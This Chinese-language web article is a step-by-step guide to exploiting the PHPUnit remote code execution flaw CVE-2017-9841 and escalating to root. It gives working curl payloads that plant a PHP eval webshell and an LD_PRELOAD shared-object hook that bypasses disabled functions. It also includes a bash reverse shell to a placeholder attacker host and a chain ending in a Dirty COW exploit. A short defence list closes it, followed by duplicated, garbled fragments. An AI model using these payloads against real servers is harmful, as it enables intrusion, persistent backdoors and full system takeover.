CVE-2017-9841漏洞利用与提权技术详解<\/h1>

漏洞概述<\/h2>

CVE-2017-9841是PHPUnit组件中的一个远程代码执行(RCE)漏洞，影响版本包括：<\/p>

4.8.19至4.8.27<\/li>

5.0.10至5.6.2<\/li> <\/ul>

漏洞位于文件vendor\/phpunit\/phpunit\/src\/Util\/PHP\/eval-stdin.php<\/code>，该文件未做任何过滤直接执行传入的PHP代码。<\/p>

漏洞验证<\/h2>
使用curl命令验证漏洞存在：<\/p>
curl --data "<?php echo(pi());"<\/span> http:\/\/target\/vendor\/phpunit\/phpunit\/src\/Util\/PHP\/eval-stdin.php
<\/span><\/span><\/code><\/pre>如果返回结果包含"3.14"，则说明漏洞存在。<\/p>
漏洞利用<\/h2>
1. 直接写入Webshell<\/h3>
如果当前目录可写，可以执行以下命令写入webshell：<\/p>
curl --data '<?php file_put_contents("a.php", '<\/span>\'<\/span>'<?php eval($_REQUEST[11]);?>'<\/span>\'<\/span>');'<\/span> http:\/\/target\/vendor\/phpunit\/phpunit\/src\/Util\/PHP\/eval-stdin.php
<\/span><\/span><\/code><\/pre>这将在当前目录创建a.php<\/code>的webshell。<\/p>
2. 使用中转脚本<\/h3>
如果目录不可写，可以使用菜刀中转脚本：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$webshell=<\/span>""<\/span>;
<\/span><\/span>$data =<\/span> file_get_contents<\/span>("php:\/\/input"<\/span>);
<\/span><\/span>$data=<\/span>substr<\/span>($data,1<\/span>);
<\/span><\/span>$data=<\/span>str_replace<\/span>("%2F"<\/span>,'\/'<\/span>,$data);
<\/span><\/span>$data=<\/span>str_replace<\/span>("%2B"<\/span>,'+'<\/span>,$data);
<\/span><\/span>$data=<\/span>str_replace<\/span>("%3D"<\/span>,'='<\/span>,$data);
<\/span><\/span>$data=<\/span> "<?php "<\/span>.<\/span> $data;
<\/span><\/span>echo<\/span> $data;
<\/span><\/span>$opts =<\/span> array<\/span> (
<\/span><\/span>    'http'<\/span> =><\/span> array<\/span> (
<\/span><\/span>        'method'<\/span> =><\/span> 'POST'<\/span>,
<\/span><\/span>        'header'<\/span>=><\/span> "Content-type: application\/x-www-form-urlencoded<\/span>\r\n<\/span>"<\/span> .<\/span>
<\/span><\/span>            "Content-Length: "<\/span> .<\/span> strlen<\/span>($data) .<\/span> "<\/span>\r\n<\/span>"<\/span>,
<\/span><\/span>        'content'<\/span> =><\/span> $data
<\/span><\/span>    )
<\/span><\/span>);
<\/span><\/span>$context =<\/span> stream_context_create<\/span>($opts);
<\/span><\/span>$html =<\/span> @<\/span>file_get_contents<\/span>($webshell, false<\/span>, $context);
<\/span><\/span>echo<\/span> $html;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>权限提升技术<\/h2>
1. LD_PRELOAD提权<\/h3>
在目标系统禁用大部分命令执行函数的情况下，可以使用LD_PRELOAD技术绕过限制。<\/p>
编译恶意so文件<\/h4>
hack.c<\/code>内容：<\/p>
#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> payload<\/span>() {
<\/span><\/span>    system("echo aaaaa> \/tmp\/abc.txt"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> geteuid<\/span>() {
<\/span><\/span>    if<\/span> (getenv("LD_PRELOAD"<\/span>) ==<\/span> NULL) { return<\/span> 0<\/span>; }
<\/span><\/span>    unsetenv("LD_PRELOAD"<\/span>);
<\/span><\/span>    payload();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>编译命令：<\/p>
gcc -c -fPIC hack.c -o hack
<\/span><\/span>gcc -shared hack -o hack.so
<\/span><\/span><\/code><\/pre>使用PHP调用<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>putenv<\/span>("LD_PRELOAD=\/var\/www\/hack.so"<\/span>);
<\/span><\/span>mail<\/span>("a@localhost"<\/span>,""<\/span>,""<\/span>,""<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>处理空格问题<\/h4>
如果命令包含空格，使用${IFS}<\/code>代替：<\/p>
system("\/usr\/bin\/python${IFS}\/tmp\/1.py"<\/span>);
<\/span><\/span><\/code><\/pre>2. 自动化执行Python脚本<\/h3>
修改hack.c<\/code>调用Python脚本：<\/p>
#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> payload<\/span>() {
<\/span><\/span>    system("\/usr\/bin\/python${IFS}\/tmp\/1.py"<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> geteuid<\/span>() {
<\/span><\/span>    if<\/span> (getenv("LD_PRELOAD"<\/span>) ==<\/span> NULL) { return<\/span> 0<\/span>; }
<\/span><\/span>    unsetenv("LD_PRELOAD"<\/span>);
<\/span><\/span>    payload();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>1.py<\/code>示例内容：<\/p>
import<\/span> os
<\/span><\/span>os.<\/span>system("netstat -plant >\/tmp\/res.txt"<\/span>)
<\/span><\/span><\/code><\/pre>3. 反弹Shell<\/h3>
修改1.py<\/code>实现反弹shell：<\/p>
import<\/span> os
<\/span><\/span>os.<\/span>system("bash -i >& \/dev\/tcp\/attacker_ip\/port 0>&1"<\/span>)
<\/span><\/span><\/code><\/pre>4. 使用脏牛(Dirty Cow)提权<\/h3>

在本地编译脏牛exp<\/li>
上传到目标服务器<\/li>
在反弹的shell中执行提权<\/li>
<\/ol>
注意事项<\/h2>

使用LD_PRELOAD技术时，每次刷新会创建新进程，可能导致大量僵尸进程<\/li>
目标系统可能禁用某些函数，需要灵活选择利用方式<\/li>
在LNMP环境下，许多命令执行函数被禁用，LD_PRELOAD是有效绕过方式<\/li>
使用${IFS}<\/code>代替空格可以绕过某些限制<\/li>
<\/ol>
完整利用流程<\/h2>

扫描目标是否存在漏洞<\/li>
验证漏洞存在性<\/li>
写入webshell或使用中转脚本<\/li>
上传编译好的恶意so文件<\/li>
通过PHP调用触发so文件<\/li>
使用Python脚本实现更复杂的操作<\/li>
反弹shell获取交互式会话<\/li>
上传并执行提权exp获取root权限<\/li>
<\/ol>
防御建议<\/h2>

升级PHPUnit到最新版本<\/li>
删除或限制访问eval-stdin.php<\/code>文件<\/li>
限制服务器目录写入权限<\/li>
禁用不必要的PHP函数<\/li>
定期检查服务器上的可疑文件<\/li>
使用安全配置加固服务器<\/li>
<\/ol>

CVE-2017-9841漏洞利用与提权技术详解<\/h1>

漏洞利用<\/h2>

权限提升技术<\/h2>

1. LD_PRELOAD提权<\/h3> 在目标系统禁用大部分命令执行函数的情况下，可以使用LD_PRELOAD技术绕过限制。<\/p>

防御建议<\/h2> 升级PHPUnit到最新版本<\/li> 删除或限制访问eval-stdin.php<\/code>文件<\/li> 限制服务器目录写入权限<\/li> 禁用不必要的PHP函数<\/li> 定期检查服务器上的可疑文件<\/li> 使用安全配置加固服务器<\/li> <\/ol>

1. LD_PRELOAD提权<\/h3>
在目标系统禁用大部分命令执行函数的情况下，可以使用LD_PRELOAD技术绕过限制。<\/p>

防御建议<\/h2>

升级PHPUnit到最新版本<\/li>
删除或限制访问`eval-stdin.php<\/code>文件<\/li>`
`限制服务器目录写入权限<\/li>`
`禁用不必要的PHP函数<\/li>`
`定期检查服务器上的可疑文件<\/li>`
`使用安全配置加固服务器<\/li> <\/ol>`